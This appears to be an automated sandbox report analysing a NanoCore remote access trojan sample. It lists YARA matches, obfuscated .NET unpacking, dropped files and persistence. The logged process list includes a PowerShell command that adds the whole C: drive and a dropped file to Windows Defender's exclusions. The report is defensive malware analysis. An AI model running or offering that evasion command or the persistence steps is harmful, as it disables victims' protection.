Source: 0.2.ZVFVY7NwZ7.exe.3eff6b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.ZVFVY7NwZ7.exe.2edc690.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.ZVFVY7NwZ7.exe.2edc690.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.ZVFVY7NwZ7.exe.2ec18dc.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: ZVFVY7NwZ7.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: chromee.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ZVFVY7NwZ7.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: ZVFVY7NwZ7.exe, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: chromee.exe.0.dr, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ZVFVY7NwZ7.exe.0.dr, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.ZVFVY7NwZ7.exe.980000.0.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.ZVFVY7NwZ7.exe.980000.0.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.ZVFVY7NwZ7.exe.a40000.1.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.0.ZVFVY7NwZ7.exe.a40000.0.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/15@9/1

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{4614bd42-26c0-4da0-8e09-16890d37c1d7}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_01

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

File created: C:\Users\user\AppData\Local\Temp\_Lzqtfofnnzmk.vbs

Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Lzqtfofnnzmk.vbs'

Source: ZVFVY7NwZ7.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

File read: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ZVFVY7NwZ7.exe 'C:\Users\user\Desktop\ZVFVY7NwZ7.exe'
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Lzqtfofnnzmk.vbs'
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process created: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Lzqtfofnnzmk.vbs'	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process created: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe'	Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ZVFVY7NwZ7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ZVFVY7NwZ7.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: ZVFVY7NwZ7.exe, 0000000D.00000002.484283906.0000000006400000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: ZVFVY7NwZ7.exe, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	.Net Code: CB7MGbvqT6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: chromee.exe.0.dr, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	.Net Code: CB7MGbvqT6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: ZVFVY7NwZ7.exe.0.dr, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	.Net Code: CB7MGbvqT6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.ZVFVY7NwZ7.exe.980000.0.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	.Net Code: CB7MGbvqT6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.ZVFVY7NwZ7.exe.980000.0.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	.Net Code: CB7MGbvqT6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.ZVFVY7NwZ7.exe.a40000.1.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	.Net Code: CB7MGbvqT6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.ZVFVY7NwZ7.exe.a40000.0.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	.Net Code: CB7MGbvqT6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.ZVFVY7NwZ7.exe.a40000.4.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	.Net Code: CB7MGbvqT6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.ZVFVY7NwZ7.exe.a40000.2.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	.Net Code: CB7MGbvqT6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: ZVFVY7NwZ7.exe

Static PE information: 0xBF2AF027 [Thu Aug 20 02:10:47 2071 UTC]

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Code function: 0_2_054A2879 push ebx; ret	0_2_054A287A
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Code function: 0_2_054A6BF8 push eax; iretd	0_2_054A6BF9
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_053769F8 pushad ; retf	13_2_053769F9
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_0644A2D3 push es; ret	13_2_0644A2E0
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_0644A310 push es; ret	13_2_0644A320
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_0644D1D4 push es; iretd	13_2_0644D1DD
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_0644D1DE push esi; iretd	13_2_0644D1E1
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_0644D1E2 push es; iretd	13_2_0644D1E4
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_06440990 push es; iretd	13_2_06441900
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072DE540 pushad ; ret	13_2_072DE541
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072D1A73 push es; ret	13_2_072D1A80
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072D1A9B push es; ret	13_2_072D1AA0
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072D19C3 push esp; iretd	13_2_072D19C9
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_072D2030 push es; ret	13_2_072D2040

Source: initial sample	Static PE information: section name: .text entropy: 7.99463093072
Source: initial sample	Static PE information: section name: .text entropy: 7.99463093072
Source: initial sample	Static PE information: section name: .text entropy: 7.99463093072

Source: ZVFVY7NwZ7.exe, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	High entropy of concatenated method names: '.ctor', 'CB7MGbvqT6', 'wLDM6g1Axf', 'Af5MpdASfh', 'bsgM8rprp6', 'M2hMa018f0', 'poIMJqqbav', 'kwSMghk5r9', 'trOMSJpiVV', 'S4XEDYMAGm1u4EU0HTX'
Source: chromee.exe.0.dr, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	High entropy of concatenated method names: '.ctor', 'CB7MGbvqT6', 'wLDM6g1Axf', 'Af5MpdASfh', 'bsgM8rprp6', 'M2hMa018f0', 'poIMJqqbav', 'kwSMghk5r9', 'trOMSJpiVV', 'S4XEDYMAGm1u4EU0HTX'
Source: ZVFVY7NwZ7.exe.0.dr, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	High entropy of concatenated method names: '.ctor', 'CB7MGbvqT6', 'wLDM6g1Axf', 'Af5MpdASfh', 'bsgM8rprp6', 'M2hMa018f0', 'poIMJqqbav', 'kwSMghk5r9', 'trOMSJpiVV', 'S4XEDYMAGm1u4EU0HTX'
Source: 0.2.ZVFVY7NwZ7.exe.980000.0.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	High entropy of concatenated method names: '.ctor', 'CB7MGbvqT6', 'wLDM6g1Axf', 'Af5MpdASfh', 'bsgM8rprp6', 'M2hMa018f0', 'poIMJqqbav', 'kwSMghk5r9', 'trOMSJpiVV', 'S4XEDYMAGm1u4EU0HTX'
Source: 0.0.ZVFVY7NwZ7.exe.980000.0.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	High entropy of concatenated method names: '.ctor', 'CB7MGbvqT6', 'wLDM6g1Axf', 'Af5MpdASfh', 'bsgM8rprp6', 'M2hMa018f0', 'poIMJqqbav', 'kwSMghk5r9', 'trOMSJpiVV', 'S4XEDYMAGm1u4EU0HTX'
Source: 13.2.ZVFVY7NwZ7.exe.a40000.1.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	High entropy of concatenated method names: '.ctor', 'CB7MGbvqT6', 'wLDM6g1Axf', 'Af5MpdASfh', 'bsgM8rprp6', 'M2hMa018f0', 'poIMJqqbav', 'kwSMghk5r9', 'trOMSJpiVV', 'S4XEDYMAGm1u4EU0HTX'
Source: 13.0.ZVFVY7NwZ7.exe.a40000.0.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	High entropy of concatenated method names: '.ctor', 'CB7MGbvqT6', 'wLDM6g1Axf', 'Af5MpdASfh', 'bsgM8rprp6', 'M2hMa018f0', 'poIMJqqbav', 'kwSMghk5r9', 'trOMSJpiVV', 'S4XEDYMAGm1u4EU0HTX'
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 13.0.ZVFVY7NwZ7.exe.a40000.4.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	High entropy of concatenated method names: '.ctor', 'CB7MGbvqT6', 'wLDM6g1Axf', 'Af5MpdASfh', 'bsgM8rprp6', 'M2hMa018f0', 'poIMJqqbav', 'kwSMghk5r9', 'trOMSJpiVV', 'S4XEDYMAGm1u4EU0HTX'
Source: 13.0.ZVFVY7NwZ7.exe.a40000.2.unpack, s01T44MtaEdFa67wSrR/WvRmNFMYHBrCXALAbDc.cs	High entropy of concatenated method names: '.ctor', 'CB7MGbvqT6', 'wLDM6g1Axf', 'Af5MpdASfh', 'bsgM8rprp6', 'M2hMa018f0', 'poIMJqqbav', 'kwSMghk5r9', 'trOMSJpiVV', 'S4XEDYMAGm1u4EU0HTX'

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe			Jump to dropped file
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	File created: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe			Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

